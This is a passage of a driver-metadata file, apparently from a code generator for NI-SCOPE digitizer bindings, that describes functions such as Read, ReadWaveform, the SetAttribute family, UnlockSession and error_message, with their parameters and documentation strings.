'description': '\nInitiates an acquisition, waits for it to complete, and retrieves the\ndata. The process is similar to calling niScope_InitiateAcquisition,\nniScope_AcquisitionStatus, and niScope_Fetch. The only difference is\nthat with niScope_Read, you enable all channels specified with\n**channelList** before the acquisition; in the other method, you enable\nthe channels with niScope_ConfigureVertical.\n\nThis function may return multiple waveforms depending on the number of\nchannels, the acquisition type, and the number of records you specify.\n',
'note': '\nSome functionality is not supported in all digitizers. Refer to\n`Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'method_name_for_documentation': 'read',
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe maximum number of samples to fetch for each waveform. If the\nacquisition finishes with fewer points than requested, some devices\nreturn partial data if the acquisition finished, was aborted, or a\ntimeout of 0 was used. If it fails to complete within the timeout\nperiod, the function returns an error.\n'
},
'name': 'numSamples',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array whose length is the **numSamples** times number of\nwaveforms. Call niScope_ActualNumWfms to determine the number of\nwaveforms.\n\nNI-SCOPE returns this data sequentially, so all record 0 waveforms are\nfirst. For example, with a channel list of 0,1, you would have the\nfollowing index values:\n\nindex 0 = record 0, channel 0\n\nindex *x* = record 0, channel 1\n\nindex 2\\ *x* = record 1, channel 0\n\nindex 3\\ *x* = record 1, channel 1\n\nWhere *x* = the record length\n'
},
'name': 'waveform',
'size': {
'mechanism': 'python-code',
'value': '(num_samples * self._actual_num_wfms())'
},
'type': 'ViReal64[]',
'use_array': True
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns an array of structures with the following timing and scaling\ninformation about each waveform:\n\n- **relativeInitialX**—the time (in seconds) from the trigger to the\n first sample in the fetched waveform\n- **absoluteInitialX**—timestamp (in seconds) of the first fetched\n sample. This timestamp is comparable between records and\n acquisitions; devices that do not support this parameter use 0 for\n this output.\n- **xIncrement**—the time between points in the acquired waveform in\n seconds\n- **actualSamples**—the actual number of samples fetched and placed in\n the waveform array\n- **gain**—the gain factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\n- **offset**—the offset factor of the given channel; useful for scaling\n binary data with the following formula:\n\nvoltage = binary data × gain factor + offset\n\nCall niScope_ActualNumWfms to determine the size of this array.\n'
},
'name': 'wfmInfo',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'struct niScope_wfmInfo[]'
}
],
'returns': 'ViStatus'
},
'ReadMeasurement': {
'codegen_method': 'private',
'documentation': {
'description': '\nInitiates an acquisition, waits for it to complete, and performs the\nspecified waveform measurement for a single channel and record or for\nmultiple channels and records.\n\nRefer to `Using Fetch\nFunctions <REPLACE_DRIVER_SPECIFIC_URL_1(using_fetch_functions)>`__ for\nmore information.\n\nMany of the measurements use the low, mid, and high reference levels.\nYou configure the low, mid, and high references by using\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL to set each channel\ndifferently.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'datetime.timedelta(seconds=5.0)',
'direction': 'in',
'documentation': {
'description': '\nThe time to wait in seconds for data to be acquired; using 0 for this\nparameter tells NI-SCOPE to fetch whatever is currently available. Using\n-1 for this parameter implies infinite timeout.\n'
},
'name': 'timeout',
'python_api_converter_name': 'convert_timedelta_to_seconds',
'type': 'ViReal64',
'type_in_documentation': 'float in seconds or datetime.timedelta'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nto be performed\n'
},
'enum': 'ScalarMeasurement',
'name': 'scalarMeasFunction',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nContains an array of all measurements acquired. Call\nniScope_ActualNumWfms to determine the array length.\n'
},
'name': 'result',
'size': {
'mechanism': 'python-code',
'value': 'self._actual_num_wfms()'
},
'type': 'ViReal64[]',
'use_array': True
}
],
'returns': 'ViStatus'
},
'ReadWaveform': {
'codegen_method': 'no',
'documentation': {
'description': '\nInitiates an acquisition on the channels that you enable with\nniScope_ConfigureVertical. This function then waits for the acquisition\nto complete and returns the waveform for the channel you specify. Call\nniScope_FetchWaveform to obtain the waveforms for each of the remaining\nenabled channels without initiating another acquisition.\n\nUse niScope_ActualRecordLength to determine the required size for the\n**waveform** array.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of elements to insert into the **waveform** array.'
},
'name': 'waveformSize',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the maximum length of time in which to allow the read waveform\noperation to complete.\n\nIf the operation does not complete within this time interval, the\nfunction returns the NISCOPE_ERROR_MAX_TIME_EXCEEDED error code.\nWhen this occurs, you can call niScope_Abort to cancel the read\nwaveform operation and return the digitizer to the idle state.\n\nUnits: milliseconds\n\n| Other Defined Values\n| NISCOPE_VAL_MAX_TIME_NONE\n| NISCOPE_VAL_MAX_TIME_INFINITE\n'
},
'name': 'maxTime',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the waveform that the digitizer acquires.\nUnits: volts\n'
},
'name': 'waveform',
'size': {
'mechanism': 'python-code',
'value': None
},
'type': 'ViReal64[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the actual number of points the function placed in the\n**waveform** array.\n'
},
'name': 'actualPoints',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the time of the first point in the **waveform** array relative\nto the Reference Position.\n\nUnits: seconds\n\nFor example, if the digitizer acquires the first point in the\n**waveform** array 1 second before the trigger, this parameter returns\nthe value –1.0. If the acquisition of the first point occurs at the same\ntime as the trigger, this parameter returns the value 0.0.\n'
},
'name': 'initialX',
'type': 'ViReal64'
},
{
'direction': 'out',
'documentation': {
'description': '\nIndicates the length of time between points in the **waveform** array.\n\nUnits: seconds\n'
},
'name': 'xIncrement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ReadWaveformMeasurement': {
'codegen_method': 'no',
'documentation': {
'description': '\nInitiates a new waveform acquisition and returns a specified waveform\nmeasurement from a specific channel.\n\nThis function initiates an acquisition on the channels that you enable\nwith the niScope_ConfigureVertical function. It then waits for the\nacquisition to complete, obtains a waveform measurement on the channel\nyou specify, and returns the measurement value. You specify a particular\nmeasurement type, such as rise time, frequency, or voltage peak-to-peak.\n\nYou can call the niScope_FetchWaveformMeasurement function separately\nto obtain any other waveform measurement on a specific channel without\ninitiating another acquisition.\n\nYou must configure the appropriate reference levels before calling this\nfunction. Configure the low, mid, and high references by calling\nniScope_ConfigureRefLevels or by setting the following attributes:\n\n| NISCOPE_ATTR_MEAS_HIGH_REF\n| NISCOPE_ATTR_MEAS_LOW_REF\n| NISCOPE_ATTR_MEAS_MID_REF\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'The scalar measurement to perform.'
},
'name': 'measFunction',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the maximum length of time in which to allow the read waveform\noperation to complete.\n\nIf the operation does not complete within this time interval, the\nfunction returns the NISCOPE_ERROR_MAX_TIME_EXCEEDED error code.\nWhen this occurs, you can call niScope_Abort to cancel the read\nwaveform operation and return the digitizer to the idle state.\n\nUnits: milliseconds\n'
},
'name': 'maxTime',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': 'The measured value.'
},
'name': 'measurement',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ResetAllAttributes': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ResetAttribute': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'name': 'attributeId',
'type': 'ViAttr'
}
],
'returns': 'ViStatus'
},
'ResetDevice': {
'documentation': {
'description': '\nPerforms a hard reset of the device. Acquisition stops, all routes are\nreleased, RTSI and PFI lines are tristated, hardware is configured to\nits default state, and all session attributes are reset to their default\nstate.\n\n- `Thermal Shutdown <digitizers.chm::/Thermal_Shutdown.html>`__\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ResetInterchangeCheck': {
'codegen_method': 'no',
'documentation': {
'description': '\nWhen developing a complex test system that consists of multiple test\nmodules, it is generally a good idea to design the test modules so that\nthey can run in any order. To do so requires ensuring that each test\nmodule completely configures the state of each instrument it uses.\n\n| If a particular test module does not completely configure the state of\n an instrument, the state of the instrument depends on the\n configuration from a previously executed test module.\n| If you execute the test modules in a different order, the behavior of\n the instrument and therefore the entire test module is likely to\n change.\n\n| This change in behavior is generally instrument-specific and\n represents an interchangeability problem. You can use this function to\n test for such cases. After you call this function, the\n interchangeability checking algorithms in the specific driver ignore\n all previous configuration operations.\n| By calling this function at the beginning of a test module, you can\n determine whether the test module has dependencies on the operation of\n previously executed test modules.\n\nThis function does not clear the interchangeability warnings from the\nlist of previously recorded interchangeability warnings. If you want to\nguarantee that niScope_GetNextInterchangeWarning only returns those\ninterchangeability warnings that are generated after calling this\nfunction, you must clear the list of interchangeability warnings.\n\nYou can clear the interchangeability warnings list by repeatedly calling\nniScope_GetNextInterchangeWarning until no more interchangeability\nwarnings are returned. If you are not interested in the content of those\nwarnings, you can call niScope_ClearInterchangeWarnings.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ResetWithDefaults': {
'documentation': {
'description': '\nPerforms a software reset of the device, returning it to the default\nstate and applying any initial default settings from the IVI\nConfiguration Store.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'SampleMode': {
'codegen_method': 'no',
'documentation': {
'description': 'Returns the sample mode the digitizer is currently using.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the sample mode the digitizer is currently using; NI-SCOPE\nreturns the value of the NISCOPE_ATTR_SAMPLE_MODE attribute.\n'
},
'name': 'sampleMode',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'SampleRate': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the effective sample rate, in samples per second, of the\nacquired waveform using the current configuration. Refer to `Coercions\nof Horizontal\nParameters <REPLACE_DRIVER_SPECIFIC_URL_1(horizontal_parameters)>`__ for\nmore information about sample rate coercion.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the effective sample rate of the acquired waveform the digitizer\nacquires for each channel; the driver returns the value held in the\nNISCOPE_ATTR_HORZ_SAMPLE_RATE attribute.\n'
},
'name': 'sampleRate',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'SendSoftwareTriggerEdge': {
'documentation': {
'description': '\nSends the selected trigger to the digitizer. Call this function if you\ncalled niScope_ConfigureTriggerSoftware when you want the Reference\ntrigger to occur. You can also call this function to override a misused\nedge, digital, or hysteresis trigger. If you have configured\nNISCOPE_ATTR_ACQ_ARM_SOURCE, NISCOPE_ATTR_ARM_REF_TRIG_SRC, or\nNISCOPE_ATTR_ADV_TRIG_SRC, call this function when you want to send\nthe corresponding trigger to the digitizer.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the type of trigger to send to the digitizer.\n\n**Defined Values**\n\n| NISCOPE_VAL_SOFTWARE_TRIGGER_START (0L)\n| NISCOPE_VAL_SOFTWARE_TRIGGER_ARM_REFERENCE (1L)\n| NISCOPE_VAL_SOFTWARE_TRIGGER_REFERENCE (2L)\n| NISCOPE_VAL_SOFTWARE_TRIGGER_ADVANCE (3L)\n'
},
'enum': 'WhichTrigger',
'name': 'whichTrigger',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'SendSwTrigger': {
'codegen_method': 'no',
'documentation': {
'description': '\nSends a command to trigger the digitizer. Call this function after you\ncall niScope_ConfigureTriggerSoftware.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification. Consider using niScope_SendSoftwareTriggerEdge instead.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'SetAttributeViBoolean': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViBoolean attribute. This is a low-level function\nthat you can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the SetAttribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'SetAttributeViInt32': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViInt32 attribute. This is a low-level function that\nyou can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level functions as much as possible because\nthey handle order dependencies and multithread locking for you. In\naddition, high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute. Some values might not be\nvalid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'SetAttributeViInt64': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViInt64 attribute. This is a low-level function that\nyou can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level functions as much as possible because\nthey handle order dependencies and multithread locking for you. In\naddition, high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute. Some values might not be\nvalid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViInt64'
}
],
'returns': 'ViStatus'
},
'SetAttributeViReal64': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViReal64 attribute. This is a low-level function\nthat you can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'SetAttributeViSession': {
'codegen_method': 'no',
'documentation': {
'description': '\nSets the value of a ViSession attribute. This is a low-level function\nthat you can use to set the values of instrument-specific attributes and\ninherent IVI attributes. If the attribute represents an instrument\nstate, this function performs instrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the Set Attribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'SetAttributeViString': {
'codegen_method': 'private',
'documentation': {
'description': '\nSets the value of a ViString attribute.\n\nThis is a low-level function that you can use to set the values of\ninstrument-specific attributes and inherent IVI attributes. If the\nattribute represents an instrument state, this function performs\ninstrument I/O in the following cases:\n\n- State caching is disabled for the entire session or for the\n particular attribute.\n- State caching is enabled and the currently cached value is invalid or\n is different than the value you specify.\n',
'note': '\nNI-SCOPE contains high-level functions that set most of the instrument\nattributes. Use the high-level driver functions as much as possible\nbecause they handle order dependencies and multithread locking for you.\nIn addition, the high-level functions perform status checking only after\nsetting all of the attributes. In contrast, when you set multiple\nattributes using the SetAttribute functions, the functions check the\ninstrument status after each call. Also, when state caching is enabled,\nthe high-level functions that configure multiple attributes perform\ninstrument I/O only for the attributes whose value you change. Thus, you\ncan safely call the high-level functions without the penalty of\nredundant instrument I/O.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to set the attribute to. Some values might not\nbe valid depending on the current settings of the instrument session.\n'
},
'name': 'value',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'SetDdcFilterCoefficients': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'channel',
'type': 'ViConstString'
},
{
'direction': 'in',
'name': 'coefficientType',
'type': 'ViInt32'
},
{
'direction': 'in',
'name': 'numCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'coefficients',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'UnlockSession': {
'documentation': {
'description': '\nReleases a lock that you acquired on an instrument session using\nniScope_LockSession.\n'
},
'method_templates': [
{
'documentation_filename': 'unlock',
'method_python_name_suffix': '',
'session_filename': 'unlock'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nThis parameter serves as a convenience; if you do not want to use this\nparameter, pass VI_NULL.\n\nUse this parameter in complex functions to keep track of whether you\nhave obtained a lock and therefore need to unlock the session; pass the\naddress of a local ViBoolean variable; in the declaration of the local\nvariable, initialize it to VI_FALSE; pass the address of the same local\nvariable to any other calls you make to niScope_LockSession or\nniScope_UnlockSession in the same function.\n'
},
'name': 'callerHasLock',
'type': 'ViBoolean'
}
],
'python_name': 'unlock',
'render_in_session_base': True,
'returns': 'ViStatus',
'use_session_lock': False
},
'close': {
'codegen_method': 'private',
'documentation': {
'description': '\nWhen you are finished using an instrument driver session, you must call\nthis function to perform the following actions:\n\n- Closes the instrument I/O session.\n- Destroys the IVI session and all of its attributes.\n- Deallocates any memory resources used by the IVI session.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'error_message': {
'codegen_method': 'private',
'documentation': {
'description': 'Takes the **Error_Code** returned by the instrument driver functions, interprets it, and returns it as a user-readable string.'
},
'is_error_handling': True,
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'Identifies a particular instrument session. You obtain the **vi** parameter from niScope_init or niScope_InitWithOptions. The default is None.'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'The **error_code** returned from the instrument. The default is 0, indicating VI_SUCCESS.'
},
'name': 'errorCode',
'type': 'ViStatus'
},
{
'direction': 'out',
'documentation': {
'description': 'The error information formatted into a string.'
},
'name': 'errorMessage',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus',
'use_session_lock': False
},
'error_query': {
'codegen_method': 'no',
'documentation': {
'description': '\nReads an error code and message from the error queue. National\nInstruments digitizers do not contain an error queue. Errors are\nreported as they occur. Therefore, this function does not detect errors.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the error code for the session or execution thread. If you pass\n0 for the Buffer Size, you can pass VI_NULL for this parameter.\n'
},
'name': 'errCode',
'type': 'ViInt32'
},
{
'direction': 'out',
'documentation': {
'description': '\nFormats the error code into a user-readable message string. The array\nmust contain at least 256 elements (ViChar[256]).\n'
},
'name': 'errMessage',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'fancy_self_test': {
'codegen_method': 'python-only',
'documentation': {
'description': '\nRuns the instrument self-test routine and returns the test result(s). Refer to the\ndevice-specific help topics for an explanation of the message contents.\n\nRaises `SelfTestError` on self test failure. Attributes on exception object:\n\n- code - failure code from driver\n- message - status message from driver\n',
'table_body': [
[
'0',
'Passed self-test'
],
[
'1',
'Self-test failed'
]
],
'table_header': [
'Self-Test Code',
'Description'
]
},
